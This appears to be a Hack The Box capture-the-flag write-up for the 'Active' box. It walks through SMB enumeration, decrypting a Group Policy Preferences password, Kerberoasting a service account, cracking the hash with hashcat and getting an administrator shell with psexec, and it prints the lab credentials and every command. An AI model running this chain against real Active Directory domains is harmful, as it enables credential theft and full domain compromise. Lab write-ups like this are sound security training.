HTB | Active

This is the Box on Hack The Box Active Directory 101 Track. Find the box here.

Skill Learned

• SMB enumeration techniques

• Group Policy Preferences enumeration and exploitation

• Identification and exploitation of Kerberoastable accounts

NMAP

IP: 10.10.10.100

nmap -sT -p- --min-rate 10000 10.10.10.100

nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,49152-49158,49165-49168 10.10.10.100

nmap scan

SMB - TCP 139/445

enum4linux -a 10.10.10.100

enum4linux

here we can see that we can enumerate Replication share, let's do that

smbclient //10.10.10.100/Replication -N

smbclient to Replication

in the Replication share, we found Groups.xml

Groups.xml

Foothold/shell

In Groups.xml we found the user and cpassword

Groups.xml

GPP Passwords

Whenever a new Group Policy Preference (GPP) is created, there’s an xml file created in the SYSVOL share with that config data, including any passwords associated with the GPP. For security, Microsoft AES encrypts the password before it’s stored as cpassword. But then Microsoft published the key on MSDN.

Microsoft issued a patch in 2014 that prevented admins from putting passwords into GPP. But that patch doesn’t do anything about any of these breakable passwords that were already there, and from what I understand, pentesters still find these regularly in 2018. For more details, check out this AD Security post.

Since we have the password we can decrypt it using gpp-decrypt

gpp-decrypt

With the username and password I can connect to 3 more share

smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18

smbmap via SVC_TGS

Let's connect to Users share

smbclient //10.10.10.100/Users -U active.htb\SVC_TGS%GPPstillStandingStrong2k18

smbclient to SVC_TGS

we found user.txt

user.txt

Priv Esc

Since we have valid domain credentials, we can request a TGT (Ticket Granting Ticket)

GetUserSPNs.py active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip 10.10.10.100 -request

GetUserSPNs.py via SVC_TGS

I’ll look up the hash type here(https://hashcat.net/wiki/doku.php?id=example_hashes), and then crack it with hashcat:

hashcat -m 13100 -a 0 GetUserSPNs.out /home/anurag/Downloads/rockyou.txt --force

hashcat

and we found the password

since now we have administrator cred we can check for its share

smbmap -H 10.10.10.100 -d active.htb -u administrator -p Ticketmaster1968

smbmap to administrator

Let's connect it via psexec

psexec.py administrator:'Ticketmaster1968'@10.10.10.100

psexec.py

we can also use smbclient to connect to C$ since we have read-and-write access

smbclient //10.10.10.100/C$ -U active.htb\administrator%Ticketmaster1968

smbclient

We found the root.txt

root.txt